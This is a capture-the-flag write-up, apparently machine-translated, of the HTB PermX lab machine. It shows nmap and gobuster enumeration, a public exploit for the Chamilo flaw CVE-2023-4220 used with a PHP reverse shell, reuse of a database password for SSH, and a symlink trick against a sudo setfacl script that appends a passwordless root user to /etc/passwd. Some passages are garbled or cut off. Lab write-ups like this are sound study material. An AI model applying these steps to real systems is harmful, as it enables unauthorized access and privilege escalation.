Permx Target Notes
summarize
The permx target is a simple target for HTB, and this target overall tests the infiltrator's information-gathering ability, which can be collected only if the information is gathered fast enough to get its flags quickly.
Overall a relatively simple target machine
Target machine connection:/machines/PermX
I. nmap scanning
1) Port scanning
nmap -sT --min-rate 10000 -p- -o ports 10.10.11.23
Nmap scan report for 10.10.11.23
Host is up (2.4s latency).
Not shown: 65495 filtered tcp ports (no-response), 38 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
# Nmap done at Tue Aug 6 09:44:09 2024 -- 1 IP address (1 host up) scanned in 327.15 seconds
2) Detailed information scanning
nmap -sT -sV -sC -O -p22,80 -o detail 10.10.11.23
Nmap scan report for 10.10.11.23
Host is up (2.7s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 e25c5d8c473ed872f7b4800349866def (ECDSA)
|_ 256 1f41028e6b17189ca0ac5423e9713017 (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 4.15 - 5.6 (93%), Linux 5.4 (93%), Linux 3.8 (92%), QNAP QTS 4.0 - 4.2 (92%), Linux 5.3 - 5.4 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at /submit/ .
# Nmap done at Tue Aug 6 09:57:53 2024 -- 1 IP address (1 host up) scanned in 133.37 seconds
see that``http-title: Did not follow redirect to`
We go to the /etc/hosts file to bind the domain name
sudo vi /etc/hosts
particle marking the following noun as a direct object10.10.11.23 put it in
II. Access to the web
Start blasting subdomains
sudo gobuster dns -d -w /usr/share/SecLists/Discovery/DNS/
[sudo] kali passwords:
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain:
[+] Threads: 10
[+] Timeout: 1s
[+] Wordlist: /usr/share/SecLists/Discovery/DNS/
===============================================================
Starting gobuster in DNS enumeration mode
===============================================================
Found:
Progress: 4989 / 4990 (99.98%)
===============================================================
Finished
===============================================================
See the results
The same goes for/etc/hostsfile, open a browser to access it.
A login window, should be cms. look online for any vulnerability public information. Also do a directory blast to see if there is some page information.
1) Catalog Blasting
sudo gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/main (Status: 301) [Size: 313] [--> /main/]
/web (Status: 301) [Size: 312] [--> /web/]
/documentation (Status: 301) [Size: 322] [--> /documentation/]
/bin (Status: 301) [Size: 312] [--> /bin/]
/src (Status: 301) [Size: 312] [--> /src/]
/app (Status: 301) [Size: 312] [--> /app/]
/vendor (Status: 301) [Size: 315] [--> /vendor/]
/LICENSE (Status: 200) [Size: 35147]
/plugin (Status: 301) [Size: 315] [--> /plugin/]
/certificates (Status: 301) [Size: 321] [--> /certificates/]
Progress: 39913 / 220561 (18.10%)
/custompages (Status: 301) [Size: 320] [--> /custompages/]
/server-status (Status: 403) [Size: 278]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================
There's not much of a useful path to leak out
2) CVE Search
Found a file upload vulnerabilityCVE-2023-4220
exploit:/Ziad-Sakr/Chamilo-CVE-2023-4220-Exploit
php-reverse-shell:/tools/web-shells/php-reverse-shell
III. Gaining a foothold
Download both files.
Modify it.The ip address and port of the file
chmod +x
Successfully gaining a foothold
python3 -c 'import pty;("/bin/bash")'
export TERM=xterm-color # You can use clear to clear the screen.
We found in the user directorymtzsubscribers
IV. Obtaining mtz user privileges
find / -name 2> /dev/null
Found the configuration file for chamilo, go open it and see
cat /var/www/chamilo/app/config/
cat /var/www/chamilo/plugin/sepe/src/
In the configuration file in the app directory, we see the username and password for the database
We connect to the database
mysql -u chamilo -p03F6lY3uXAP2bkW8
Successful access to the database
Here are the hash values for admin and password
Tried to crack the hash value with tools like hashcat, but unfortunately came up empty-handed
Let's think about the password for this database03F6lY3uXAP2bkW8 Will it have the same password as its ssh user mtz? Give it a try.
sudo ssh [email protected]
03F6lY3uXAP2bkW8
Discover user flags
V. Lift to root
sudo -l to see that there is a script
#!/bin/bash
if [ "$#" -ne 3 ]; then
/usr/bin/echo "Usage: $0 user perm file"
exit 1
fi
user="$1"
perm="$2"
target="$3"
if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then
/usr/bin/echo "Access denied."
exit 1
fi
# Check if the path is a file
if [ ! -f "$target" ]; then
/usr/bin/echo "Target must be a file."
exit 1
fi
/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"
Since the file is unwritable, we'll just have to audit the script file and see if we can accomplish the lift.
Some malicious operations are blocked here, we can try chaining files
mtz@permx:~:$ ln -s /etc/passwd /home/mtz/test
mtz@permx:~:$ sudo /opt/ mtz rw /home/mtz/test
mtz@permx:~:$ echo "lingx5::0:0:lingx5:/root:/bin/bash" >> ./test
mtz@permx:~:$ su lingx5
root@permx:/home/mtz:#
Successfully got the root flag.
summarize
- We used nmap scanning, detected that the target service has http and ssh services, subdomain enumeration of the http service, in its side site, we found that he is a cms architecture
- I found the CVE-2023-4220 vulnerability of the chamilo framework on github, and exploited the exp according to the tutorials on github, and succeeded in the www-data user privileges.
- In the configuration file of the chamilo framework, we find the configuration information of the mysql database, we can successfully log in to the database, but the password of admin is hash value is difficult to crack.
- We thought about the possibility of collision between mysql and ssh (both have the same password), we found the mtz user in the home directory, tried ssh connection, and succeeded in obtaining the privileges of the mtz user
- See the sudo list in the mtz
/opt/file, an audit of the shell script shows us that this script can give ``/home/mtz/*''file to assign permissions, from which we utilize a soft connection to get the/etc/passwd` write permissions, successfully lifted to root.